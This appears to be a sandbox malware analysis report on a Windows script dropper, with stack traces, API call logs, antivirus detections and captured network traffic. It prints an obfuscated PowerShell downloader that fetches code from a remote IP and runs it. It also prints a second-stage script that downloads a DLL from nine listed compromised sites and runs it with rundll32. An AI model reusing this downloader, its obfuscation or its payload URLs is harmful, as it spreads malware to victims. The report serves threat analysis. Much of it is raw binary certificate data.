CoGetInstanceFromFile+0x7992 HACCEL_UserFree-0x443e ole32+0x173542 @ 0x7fefdd33542
GetErrorInfo+0x475 ObjectStublessClient7-0xc43 ole32+0x3d42d @ 0x7fefdbfd42d
GetErrorInfo+0x21e ObjectStublessClient7-0xe9a ole32+0x3d1d6 @ 0x7fefdbfd1d6
TranslateMessageEx+0x2a1 IntersectRect-0x11f user32+0x19bd1 @ 0x769e9bd1
TranslateMessage+0x1ea DispatchMessageW-0x42 user32+0x198da @ 0x769e98da
GetErrorInfo+0xf3 ObjectStublessClient7-0xfc5 ole32+0x3d0ab @ 0x7fefdbfd0ab
CoUnloadingWOW+0x117 OleCreateFromFileEx-0x1829 ole32+0x163e57 @ 0x7fefdd23e57
ObjectStublessClient24+0x1876 CLSIDFromString-0x57a ole32+0x10106 @ 0x7fefdbd0106
ObjectStublessClient24+0x18f2 CLSIDFromString-0x4fe ole32+0x10182 @ 0x7fefdbd0182
BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x76da652d
RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x770fc521

exception.instruction_r: 48 81 c4 c8 00 00 00 c3 48 85 f6 74 08 83 3b 00
exception.symbol: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d
exception.instruction: add rsp, 0xc8
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 42141
exception.address: 0x7fefd7da49d
registers.r14: 0
registers.r15: 0
registers.rcx: 98756672
registers.rsi: 0
registers.r10: 0
registers.rbx: 0
registers.rsp: 98762624
registers.r11: 98758432
registers.r8: 0
registers.r9: 0
registers.rdx: 1
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 1925372213
registers.r13: 0
1 0 0
file C:\Users\Public\Documents\ssd.dll
file C:\Users\test22\Desktop\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://185.7.214.7/ve/ve.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
cmdline "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString
cmdline powershell -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://185.7.214.7/ve/ve.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: powershell
parameters: -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://185.7.214.7/ve/ve.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
filepath: powershell
1 1 0
Time & API Arguments Status Return Repeated

Process32NextW

 snapshot_handle: 0x00000168
process_name: iexplore.exe
process_identifier: 2336
1 1 0

Process32NextW

 snapshot_handle: 0x00000168
process_name: iexplore.exe
process_identifier: 2456
1 1 0

Process32NextW

 snapshot_handle: 0x00000168
process_name: powershell.exe
process_identifier: 2648
1 1 0
Cyren VBS/Agent.AIB
Avast SNH:Script [Dropper]
Kaspersky HEUR:Trojan-Downloader.Script.Generic
McAfee-GW-Edition BehavesLike.HTML.ExploitBlacole.lg
Microsoft Trojan:Script/Sabsik.FL.B!ml
Ikarus Trojan.Script
AVG SNH:Script [Dropper]
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2196
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 139264
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x01c81000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 15
family: 0
111 0
Data received HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Wed, 19 Jan 2022 02:33:32 GMT Content-Type: image/png Content-Length: 972 Last-Modified: Tue, 18 Jan 2022 14:05:40 GMT Connection: keep-alive ETag: "61e6c934-3cc" Accept-Ranges: bytes
Data received $path = "C:\Users\Public\Documents\ssd.dll"; $url1 = 'https://soomaal.softuvo.xyz/wp-includes/U7Jmw9DLhYjz/'; $url2 = 'http://ippur.ufrj.br/assets/W8jp7/'; $url3 = 'https://scoute.ai/wp-content/dIg/'; $url4 = 'https://wordpress.pixeleyenow.com/b/X1E8eB/'; $url5 = 'http://sarvaero.com/assets/BRrGH0HSkc/'; $url6 = 'http://atplengineering.com/wp-admin/mDk/'; $url7 = 'http://www2.s12.xrea.com/-/gkUMZLMfkddmFdMlJ/'; $url8 = 'https://flatonicstudios.com/57sa4yh7/iOx1jeSrT/'; $url9 = 'http://blomjous.org/wp-admin/1W/'; $web = New-Object net.webclient; $urls = "$url1,$url2,$url3,$url4,$url5,$url6,$url7,$url8,$url9".split(","); foreach ($url in $urls) { try { $web.DownloadFile($url, $path); if ((Get-Item $path).Length -ge 30000) { [Diagnostics.Process]; break; } } catch{} } Sleep -s 4;cmd /c C:\Windows\SysWow64\rundll32.exe 'C:\Users\Public\Documents\ssd.dll',AnyString;
Data received ]
Data received YzčÆäˆþBï=6“’”Øt<¾ƒúéDOWNGRD ™‡gÔWh¢ûÖ&³›_øW¨^‘2jÍøûB“Àÿ 
Data received ¾
Data received º·00‚,0‚ óHØ¡˜(@'ŽB[¥ª¤¾0  *†H†÷  021 0 UUS10U  Let's Encrypt1 0 UR30 211201144918Z 220301144917Z010Usoomaal.softuvo.xyz0‚"0  *†H†÷ ‚0‚ ‚ÊÔöæáäa=OêÑ, UÁK´ùÓäYâe3æèÇ`ˆ¢´›Y•ªûP6®²–³¬ü⧧2E>ªzKÝtHA¬ä‚ú~|j£vŒ–¶õ)4õ²ôàéÓ|ÛÃ`ô‰•¹_ݕ·~}œ`9¼âpRٙ¸ûݽž"¹Á¬ô&ȹÆþÍø誙ïèôÐî_ºk`4z¬Ù˞6´š¥>¯Gì$‘~+Pá,¼N•Æ}÷tÙá7Žî.s»'B!KJf2›OìgˆR>Âä“Ô>õ¶?{þíéKu“·øõ Ÿj«m;¹x£‚N0‚J0Uÿ 0U%0++0 Uÿ00Ub¸í»ò©ÃJ¼“%|¢®VvܨÜ0U#0€.³·XVË®P @毝‹ÂÆ0U+I0G0!+0†http://r3.o.lencr.org0"+0†http://r3.i.lencr.org/0U0‚soomaal.softuvo.xyz0LU E0C0g 07 +‚ß0(0&+http://cps.letsencrypt.org0‚ +Öyõòðvߥ^«h‚Ol­î¸_N>ZêÍ¢¤j^Ž;À D\*s}v¯”ãG0E!öý” t§ŒÛ[jd{.ÞY+ôÐ5ç¹ ‹ô "çx'I\x ½UŸÔ›‘Â4Âaaaßå}Q(®v)y¾ðž99!ðVsŸc¥wå¾W}œ` øùM]&\%]DŽ}v¯”ÜG0E!¤|="Ãi”¥Âx n<Yƒ-…ß*‰®Ftá…òûtmå LôíÆÖf„;WEè—Lâ#rÊ SƒEîS2ŒæÁ0  *†H†÷  ‚ $Ò­iºÂ)YÞ°1<X`ªéQF§¹2º/od}LmÓỶÂy càY&ÌE¹$¿¼F9^(S¯sùªš89˜×ä‰.Ù"íC›£0R[9=p®ã³ô‡4uxåÝF§û”HM6;²oג¶Vfƒ/´0@]’hØR_xWIYŠŒ0³a_cç°¾¡€ æ°àò`·ô3HLÿí±Ê7yX¢‘2+T€¼ú¯Ùqé@íøö‡’¡æx ˆr‰£‡¯L_-Ðf¬Ž&ÇVÉýÓv–‹‘ªÂª|2nþÞFˆÅݽtlWIlŸRì%FhF˜ŒÐ0‚0‚þ ‘+JÏ §SöÖ.%§_Z0  *†H†÷  0O1 0 UUS1)0'U  Internet Security Research Group10U ISRG Root X10 200904000000Z 250915160000Z021 0 UUS10U  Let's Encrypt1 0 UR30‚"0  *†H†÷ ‚0‚ ‚»(Ìö ”ÓìU’Ãø‚ñ™¦zBˆ§]&ªµ+¹ÅL±¯ŽkùuÈ£×G”U5WŒž¨¢9õ‚<B©Nnõ;Ã.ۍÀ°\óY8çíÏiðZ ¾À”$%‡ú7q³ç¬á›ïÛä;ERE–©ÁSÎ4ÈRîµ®íÞ`pâ¥T«¶m—¥@4k+Ó¼fëf4|úk‹W)™ø0]ºroûÅ­Ò†X=Çç »ñ+÷†ÜÁÚq]ÔFãÌ­%Áˆ¼`guf³ñ÷¢\æSÿ:ˆ¶G¥ÿê˜ w?SùÏåõ¦p¯c¤ÿ™³“ÜS§þH…¡i®%u»ÌRõíQ¡‹Û£‚0‚0Uÿ†0U%0++0Uÿ0ÿ0U.³·XVË®P @毝‹ÂÆ0U#0€y´Yæ{¶åäs€ˆÈXöé›n02+&0$0"+0†http://x1.i.lencr.org/0'U 00  †http://x1.c.lencr.org/0"U 00g 0  +‚ß0  *†H†÷  ‚…ÊNG>£÷…D…¼Õgx²˜c­uM–=3erT- êÃíø ¿_Ì·p·n;ö^”Þä Ÿ¦ï‹²碵<‘δí9ç|%ŠGæen?FôÙðΔ+îTμŒ'K¸Á˜/¢¯Íq‘J·È¸#{-ùW>ƒÙ3 G!x ‚'Ã*ț¹Î\òdÈÀ¾yÀOŽmD ^’».÷‹áèD)ÛY íc¹!ø&”“W eÁ "® C—¡~àà†7µZ±½0¿‡n+*ÿ!NÃõ—ð^¬Ã¥¸jð.¼;3¹îKÞÌü䯄 †?ÀUC6öhá6jŽ™Ñÿ¥@§4·ÀÐc959unòºvȓé©KlÎ Ù½ûŸ·hÔe³‚=wSøŽy­ 1u*CØU—rÄ)÷Ä]NÈ®F„0×ò…_¡y»ç^p‹ᆓùÜaq%*¯ßí%PRh‹’ÜåÖµãÚ}Їl„!1®‚õû¹«È‰=áLå8ö½+½–ëÕÛ= §~YÓâøXù[¸HÍþ\O)þU#¯È°ê|“/ý¬¢ GF?ðé°·ÿ(Mh2Ög^i£“¸õ‹/ ÒRC¦o2WeM2ß8S…]~]f)ê¸Ý䕵͵VBÍÄNÆ%8DPmìÎUþéIdÔNʗœ´[Às¨«¸GÂd0‚`0‚H @w!7ÔéB¸îvª<d ·0  *†H†÷  0?1$0"U Digital Signature Trust Co.10UDST Root CA X30 210120191403Z 240930181403Z0O1 0 UUS1)0'U  Internet Security Research Group10U ISRG Root X10‚"0  *†H†÷ ‚0‚ ‚­è$sô7ó›ž+W(‡¾Ü·ß8Œn<æW x÷u¢þõjnöO(ÛÞh†lD“¶±cýk¿Òê1›!~Ñ3<ºHõÝyß³¸ÿñ!šKÁŠ†qiJffl~<p¿­)"óäÀ怮âK·™~”ŸÓG—|™H#Sè8®O oƒ.ÑIWŒ€t¶Ú/Ð8{p!uò0<ú®ÝÚc«ëOŽK~Ï èÿµw.ô²{JàL% p) áS$ìÙJŒ?‰£aQÞ¬‡”ôcqì.âo[˜á‰\4ylvï;byæÛ¤š/&ÅÐáÞÙŽû·÷¨÷Ç嘏6•çâ7– 6užûr±›¼ùI؁Ý´*ÖAé¬v• ØßÕ½5/(lҘÁ¨ dwnG7ºÎ¬Y^hr։ÅA)>Y>Ý&õ$ɧZ£L@F¡™µ§:Qn†;ž}r§xYí>Qx Ð/²>{JKsüÆêàP|C“t³ÊtçŽÐ0Ô[q6´ºÁ00\H·‚;˜¦}`Š¢£)‚̺½ƒ¢ƒA¡Öñ¶ð¨|†;F¨H*ˆÜvšv¿j¥=ë8ódÞÈ+ (ÿ÷ÛâBÔ"Ð']áyþçpˆ­Næً:ÆÝ'Qnÿ¼dõ3CO£‚F0‚B0Uÿ0ÿ0Uÿ0K+?0=0;+0†/http://apps.identrust.com/roots/dstrootcax3.p7c0U#0€ħ±¤{,qúÛáKuÿÄ`…‰0TU M0K0g 0? +‚ß000.+"http://cps.root-x1.letsencrypt.org0<U50301 / -†+http://crl.identrust.com/DSTROOTCAX3CRL.crl0Uy´Yæ{¶åäs€ˆÈXöé›n0  *†H†÷  ‚ sl–nÿRЮ݌çZ­/¨ã¿É PÂålB»o›ô´OÂDˆuÌë›bnxÞì'º9\õ¢¡nV”pS±»ä¯Ð¢Ã+ԖôÅ 53ùØa6àq´¸µª‚E•Àò©#(çÖ¡ËgÚ C,ª“ÉÞõ«i]õ[†X"ÊMUäpgmÂWÅF9AϊXƒXm™þWè6ð#ªýˆ—Ðã\”Iµµ5Ò.¿N…ïà…’ë;l)# `ÜEL;éûÞÜDøX˜®ê½EE¡ˆ]fÊþéo‚ÈB ûéìã†Þã8ú¤}±ØèI‚„›+èkO 8w.ùÝç9
Data received K
Data received GAÖ:ÜT¯Üë^xŠ^"HNÖúQ¬•OÞ?µê‹TŠDkì̚}o{/wÒÈd–v¢Q?¿ËðxdãBzŸÐ3O¿gèYãíƚÄ‘ƒ¥JîtÊ¡ðn»^z(=ø÷²·ýã'*ÓÔÚKhX5ݧbXªÙ<@Öý‘_"R§ç)gdŠÛ ¨×•êˆï b +ÖÙ=ãé IÍÇ7'Ow]lî>õ^¸ŽËq9âW¥~êcø21”‹Aö1í^ÎYFÐuÂ*uz¢’ËòvçéÒ‹þ`Åè¹)(´¨$íjšŸ ¦x[¡Ør Z¥#¨´ $îŠÇ˅=ô½áÁ]OvQ5)ùPÈ[ Ý!"ù¨RÚþt—2P“צQ!0]Ô¤ÌddRG4¯”æ÷¹'¼Œã~*ìæ€ä
Data received 
Data received 
Data received 
Data received 
Data received 0
Data received nm.…ÅÑ}¦Ì‚ŒRmã’'y۲֗AJÿ©pBìÚaVð»gi3ÃÁå©Rù
Data received HTTP/1.1 302 Moved Temporarily Server: nginx Date: Wed, 19 Jan 2022 02:33:44 GMT Content-Type: text/html Content-Length: 138 Connection: keep-alive Location: https://ippur.ufrj.br/assets/W8jp7/ <html> <head><title>302 Found</title></head> <body> <center><h1>302 Found</h1></center> <hr><center>nginx</center> </body> </html>
Data received 
Data received F
Data received YXkçà)w¹Ã@îݧyޚÁ¡!P«ãDOWNGRD µµ"ŒÌ-í_e¢¡Ä½nS[6¡[+£V _‹$ïÑÀÿ 
Data received ·
Data received ³°)0‚%0‚  …+àß%ÜÆßíw¨)Øù·p0  *†H†÷  021 0 UUS10U  Let's Encrypt1 0 UR30 211218061514Z 220318061513Z010U scoute.ai0‚"0  *†H†÷ ‚0‚ ‚ÏâdH:ëÈð¦8åkB_·¯.³Ke)Muà/ê™åv$³áÉ2t'ÔÛ»<A‡C*ÚN¬‰×{û…P2•ÚHuɔJàm{?˜|Ì«Ñ;IÒ;÷¬Â¥‹óK8>l¥JšFåã“uY`ôÌÈï% ×ïÉ)‚C ¬ÅßCîÊ…¿³{sÂnÊËÙŖ޻ t ÷óð¾u·òSÈïYšpô K²Ù»ÂT[n¬Ò¥_$ÅOÒ¶U8^hβaV«šs°qfÓ}¼óìxr1Ú/Ã/€ß›‹kQ5~‰B¾ß;d¬¶DU…e.ÉYk¯;Ñ{n.&lØDû›£‚Q0‚M0Uÿ 0U%0++0 Uÿ00U|S<þ0MÖÃptz*-تã’ú˜0U#0€.³·XVË®P @毝‹ÂÆ0U+I0G0!+0†http://r3.o.lencr.org0"+0†http://r3.i.lencr.org/0#U0‚ scoute.ai‚ www.scoute.ai0LU E0C0g 07 +‚ß0(0&+http://cps.letsencrypt.org0‚ +Öyóðîuߥ^«h‚Ol­î¸_N>ZêÍ¢¤j^Ž;À D\*s}ÌeF0D HÏÌâ­ÈIî¬wÈM(RÓygÞµúð\äEü?ïe€ ˜¯«yÇy{4£ó<…Cm+ƒTyyåò(ÛYuF¥Uëuú‘ 0µ¢‰iôó},At¾ýI¸…«òüpþmG}Ìe¦F0D nÂ$rì¦õ¿²ûÍSúùì|³ÉÊ7člz³Ê¦2dt N2j·ÞYÿ/c ÔÒN÷¤E\ï÷Õh“µÃš&Ÿ_’’0  *†H†÷  ‚VÎ%Ïk$ŠŠÍzéKx£–ãs²$¬3IÉãGDŸŽŒ!¬K4éƒÃ,îžÀ\‚°íjt£†qÜlÖÖ÷U ^1|ª'u€c\y¢ä¤ÚŸrk`֌7çùœè„ I›iž¸‘{š²Ï:¡lRs3$”À®G‰ÑÍn:Á.›ÓQ Õw ,UÀ £0'Õ}Õç½q8Bœ@xFng//ч‘–À½æџ3ˆ{nTŒìIh:ÖS+©¬Ò&'Îka€„Iݚ曎­É`œEX¯_þGê–6›È¸”¨®y¿1ŠÈa`XÄYø°Ï‡‘…=Ԛ®ˆÎ §0‚0‚þ ‘+JÏ §SöÖ.%§_Z0  *†H†÷  0O1 0 UUS1)0'U  Internet Security Research Group10U ISRG Root X10 200904000000Z 250915160000Z021 0 UUS10U  Let's Encrypt1 0 UR30‚"0  *†H†÷ ‚0‚ ‚»(Ìö ”ÓìU’Ãø‚ñ™¦zBˆ§]&ªµ+¹ÅL±¯ŽkùuÈ£×G”U5WŒž¨¢9õ‚<B©Nnõ;Ã.ۍÀ°\óY8çíÏiðZ ¾À”$%‡ú7q³ç¬á›ïÛä;ERE–©ÁSÎ4ÈRîµ®íÞ`pâ¥T«¶m—¥@4k+Ó¼fëf4|úk‹W)™ø0]ºroûÅ­Ò†X=Çç »ñ+÷†ÜÁÚq]ÔFãÌ­%Áˆ¼`guf³ñ÷¢\æSÿ:ˆ¶G¥ÿê˜ w?SùÏåõ¦p¯c¤ÿ™³“ÜS§þH…¡i®%u»ÌRõíQ¡‹Û£‚0‚0Uÿ†0U%0++0Uÿ0ÿ0U.³·XVË®P @毝‹ÂÆ0U#0€y´Yæ{¶åäs€ˆÈXöé›n02+&0$0"+0†http://x1.i.lencr.org/0'U 00  †http://x1.c.lencr.org/0"U 00g 0  +‚ß0  *†H†÷  ‚…ÊNG>£÷…D…¼Õgx²˜c­uM–=3erT- êÃíø ¿_Ì·p·n;ö^”Þä Ÿ¦ï‹²碵<‘δí9ç|%ŠGæen?FôÙðΔ+îTμŒ'K¸Á˜/¢¯Íq‘J·È¸#{-ùW>ƒÙ3 G!x ‚'Ã*ț¹Î\òdÈÀ¾yÀOŽmD ^’».÷‹áèD)ÛY íc¹!ø&”“W eÁ "® C—¡~àà†7µZ±½0¿‡n+*ÿ!NÃõ—ð^¬Ã¥¸jð.¼;3¹îKÞÌü䯄 †?ÀUC6öhá6jŽ™Ñÿ¥@§4·ÀÐc959unòºvȓé©KlÎ Ù½ûŸ·hÔe³‚=wSøŽy­ 1u*CØU—rÄ)÷Ä]NÈ®F„0×ò…_¡y»ç^p‹ᆓùÜaq%*¯ßí%PRh‹’ÜåÖµãÚ}Їl„!1®‚õû¹«È‰=áLå8ö½+½–ëÕÛ= §~YÓâøXù[¸HÍþ\O)þU#¯È°ê|“/ý¬¢ GF?ðé°·ÿ(Mh2Ög^i£“¸õ‹/ ÒRC¦o2WeM2ß8S…]~]f)ê¸Ý䕵͵VBÍÄNÆ%8DPmìÎUþéIdÔNʗœ´[Às¨«¸GÂd0‚`0‚H @w!7ÔéB¸îvª<d ·0  *†H†÷  0?1$0"U Digital Signature Trust Co.10UDST Root CA X30 210120191403Z 240930181403Z0O1 0 UUS1)0'U  Internet Security Research Group10U ISRG Root X10‚"0  *†H†÷ ‚0‚ ‚­è$sô7ó›ž+W(‡¾Ü·ß8Œn<æW x÷u¢þõjnöO(ÛÞh†lD“¶±cýk¿Òê1›!~Ñ3<ºHõÝyß³¸ÿñ!šKÁŠ†qiJffl~<p¿­)"óäÀ怮âK·™~”ŸÓG—|™H#Sè8®O oƒ.ÑIWŒ€t¶Ú/Ð8{p!uò0<ú®ÝÚc«ëOŽK~Ï èÿµw.ô²{JàL% p) áS$ìÙJŒ?‰£aQÞ¬‡”ôcqì.âo[˜á‰\4ylvï;byæÛ¤š/&ÅÐáÞÙŽû·÷¨÷Ç嘏6•çâ7– 6užûr±›¼ùI؁Ý´*ÖAé¬v• ØßÕ½5/(lҘÁ¨ dwnG7ºÎ¬Y^hr։ÅA)>Y>Ý&õ$ɧZ£L@F¡™µ§:Qn†;ž}r§xYí>Qx Ð/²>{JKsüÆêàP|C“t³ÊtçŽÐ0Ô[q6´ºÁ00\H·‚;˜¦}`Š¢£)‚̺½ƒ¢ƒA¡Öñ¶ð¨|†;F¨H*ˆÜvšv¿j¥=ë8ódÞÈ+ (ÿ÷ÛâBÔ"Ð']áyþçpˆ­Næً:ÆÝ'Qnÿ¼dõ3CO£‚F0‚B0Uÿ0ÿ0Uÿ0K+?0=0;+0†/http://apps.identrust.com/roots/dstrootcax3.p7c0U#0€ħ±¤{,qúÛáKuÿÄ`…‰0TU M0K0g 0? +‚ß000.+"http://cps.root-x1.letsencrypt.org0<U50301 / -†+http://crl.identrust.com/DSTROOTCAX3CRL.crl0Uy´Yæ{¶åäs€ˆÈXöé›n0  *†H†÷  ‚ sl–nÿRЮ݌çZ­/¨ã¿É PÂålB»o›ô´OÂDˆuÌë›bnxÞì'º9\õ¢¡nV”pS±»ä¯Ð¢Ã+ԖôÅ 53ùØa6àq´¸µª‚E•Àò©#(çÖ¡ËgÚ C,ª“ÉÞõ«i]õ[†X"ÊMUäpgmÂWÅF9AϊXƒXm™þWè6ð#ªýˆ—Ðã\”Iµµ5Ò.¿N…ïà…’ë;l)# `ÜEL;éûÞÜDøX˜®ê½EE¡ˆ]fÊþéo‚ÈB ûéìã†Þã8ú¤}±ØèI‚„›+èkO 8w.ùÝç9
Data received GA¡ž6(X…™gg™šFiKÞ®ÛmoM£<Áy7ôÄ ±gðWÎÉxø 1s§Ÿ‰•Þ=ò £º ¤ÜèGi¡õ°W‚,‰çÖÈÆÁ7_#|ˆ–æ1Ri.5†ÅOäÙñÝŸºšÛ.³S†FCkáøÉ&f‡R;FÕ"ç0j&⤁&µúâéÙöڃ{Aæ> ¯Sæ¹ik{óÝ=q.ê÷£½<6dr‡V©¢6@Wˆâ%ƒeËцIŽ‡bœíÒ`bõ^UN¼?…¾á\ùÚHŸ¡M-ºuEŒŠlÃêˆî&yëVH;˜=øØì,’jȇ (v Ïn›”©ûÍï7Åہ-'ûh»$_è8rÛø%®b¶Sè€$œœˆZ°Ï :xÊ:µ@Q"ÌÃåØs)"q*gÖq
Data received ¡‹¸ZÐÙÏ°»T<¼ó›ªU¹»“ˆlÌeœC$.p¬šÚàqwÑ9ºð¹k"vT
Data received U
Data received QÍç°4ír@*X17ö@ t8ùñ-DOWNGRD yûeûl([.jª˜×yà›¸·×÷ܟþS?6|/ ÿ
Data received É
Data received ÅÂ;0‚70‚ Œ Ú°¶Ÿ²F´ŠÊP³rš 0  *†H†÷  021 0 UUS10U  Let's Encrypt1 0 UR30 211209094957Z 220309094956Z0$1"0 Uwordpress.pixeleyenow.com0‚"0  *†H†÷ ‚0‚ ‚ËoݖìС׌ÄރìÝ}É°€õ€ä<(Ä©ì…Th…û4wóuiZÅèÓy4YêL³›’Ói‚S#툵Ù'ø>ݍƒc”ô•®vX¯ÑÂN³»kÚÜ×ê6]¦c˝^kBVŠßÆŒéÕVT˜ ×nú÷’z„¾gܦxJ ™ßNÃvƒ”ØY/Z€C˜ñ¨ShÛm¦sýÎ>,*L?sÎN¤2(« 8"8]!G16q]'Ñ9¸Ê1?Ù¢‡ñ=³SAP2m¸¥ð¿ 4¾áœš§¤ŒÔx(Ðͅ>#‘”]ì|Þ7¡9ÉÒ͕?à.ÉiÝS¯ªÔ‡R­7£‚S0‚O0Uÿ 0U%0++0 Uÿ00U¥Fu èùðîIá"\n»DÙ0U#0€.³·XVË®P @毝‹ÂÆ0U+I0G0!+0†http://r3.o.lencr.org0"+0†http://r3.i.lencr.org/0$U0‚wordpress.pixeleyenow.com0LU E0C0g 07 +‚ß0(0&+http://cps.letsencrypt.org0‚ +Öyôñïv)y¾ðž99!ðVsŸc¥wå¾W}œ` øùM]&\%]DŽ}žÐgñG0E!ð³w7·Ô™š-xM”6ŠÞ%§ž‘%'éÖ™ _ZxÆ¿÷;¦¡_Êo'W X€Ûlz&Œ4O^ ÇQuߥ^«h‚Ol­î¸_N>ZêÍ¢¤j^Ž;À D\*s}žÐiöF0D 8Üs­¤ìW'S3#ïT5rWrDù"{-”ꃄ¹q/ 6Ll;î€ŒhŠË×3èÌÎjÐJ`?#ú(ôb…‘¾*0  *†H†÷  ‚©åªÙu/X“¨`ø¤ÖØ'ïÉ¢–MêܖX›h»œÞg%~áLA&ig²éA:‘ÿsHðî@ÂìZV¸±²‰ºÕL)f¥)f4ʗ·€ 4Ê¢—¹ûàŒþxãiñôalÆ/Sä&Ÿ²QӻľŽ¹çg„‘àÀÚ5æò–AHqórw=D¥Ìêa3yäÝN^¯#Bœ½¡ö÷ê0<Í‹5^t6POPS¦BEzÕíy„“­Í(_iÞÒuÆtˆxÒ¯_…Å^M§è0¬ ¹óêŒBóœ„ÄÝ>bú¦ó9ãaꋱ¡0¯6¡[<‹0‚0‚þ ‘+JÏ §SöÖ.%§_Z0  *†H†÷  0O1 0 UUS1)0'U  Internet Security Research Group10U ISRG Root X10 200904000000Z 250915160000Z021 0 UUS10U  Let's Encrypt1 0 UR30‚"0  *†H†÷ ‚0‚ ‚»(Ìö ”ÓìU’Ãø‚ñ™¦zBˆ§]&ªµ+¹ÅL±¯ŽkùuÈ£×G”U5WŒž¨¢9õ‚<B©Nnõ;Ã.ۍÀ°\óY8çíÏiðZ ¾À”$%‡ú7q³ç¬á›ïÛä;ERE–©ÁSÎ4ÈRîµ®íÞ`pâ¥T«¶m—¥@4k+Ó¼fëf4|úk‹W)™ø0]ºroûÅ­Ò†X=Çç »ñ+÷†ÜÁÚq]ÔFãÌ­%Áˆ¼`guf³ñ÷¢\æSÿ:ˆ¶G¥ÿê˜ w?SùÏåõ¦p¯c¤ÿ™³“ÜS§þH…¡i®%u»ÌRõíQ¡‹Û£‚0‚0Uÿ†0U%0++0Uÿ0ÿ0U.³·XVË®P @毝‹ÂÆ0U#0€y´Yæ{¶åäs€ˆÈXöé›n02+&0$0"+0†http://x1.i.lencr.org/0'U 00  †http://x1.c.lencr.org/0"U 00g 0  +‚ß0  *†H†÷  ‚…ÊNG>£÷…D…¼Õgx²˜c­uM–=3erT- êÃíø ¿_Ì·p·n;ö^”Þä Ÿ¦ï‹²碵<‘δí9ç|%ŠGæen?FôÙðΔ+îTμŒ'K¸Á˜/¢¯Íq‘J·È¸#{-ùW>ƒÙ3 G!x ‚'Ã*ț¹Î\òdÈÀ¾yÀOŽmD ^’».÷‹áèD)ÛY íc¹!ø&”“W eÁ "® C—¡~àà†7µZ±½0¿‡n+*ÿ!NÃõ—ð^¬Ã¥¸jð.¼;3¹îKÞÌü䯄 †?ÀUC6öhá6jŽ™Ñÿ¥@§4·ÀÐc959unòºvȓé©KlÎ Ù½ûŸ·hÔe³‚=wSøŽy­ 1u*CØU—rÄ)÷Ä]NÈ®F„0×ò…_¡y»ç^p‹ᆓùÜaq%*¯ßí%PRh‹’ÜåÖµãÚ}Їl„!1®‚õû¹«È‰=áLå8ö½+½–ëÕÛ= §~YÓâøXù[¸HÍþ\O)þU#¯È°ê|“/ý¬¢ GF?ðé°·ÿ(Mh2Ög^i£“¸õ‹/ ÒRC¦o2WeM2ß8S…]~]f)ê¸Ý䕵͵VBÍÄNÆ%8DPmìÎUþéIdÔNʗœ´[Às¨«¸GÂd0‚`0‚H @w!7ÔéB¸îvª<d ·0  *†H†÷  0?1$0"U Digital Signature Trust Co.10UDST Root CA X30 210120191403Z 240930181403Z0O1 0 UUS1)0'U  Internet Security Research Group10U ISRG Root X10‚"0  *†H†÷ ‚0‚ ‚­è$sô7ó›ž+W(‡¾Ü·ß8Œn<æW x÷u¢þõjnöO(ÛÞh†lD“¶±cýk¿Òê1›!~Ñ3<ºHõÝyß³¸ÿñ!šKÁŠ†qiJffl~<p¿­)"óäÀ怮âK·™~”ŸÓG—|™H#Sè8®O oƒ.ÑIWŒ€t¶Ú/Ð8{p!uò0<ú®ÝÚc«ëOŽK~Ï èÿµw.ô²{JàL% 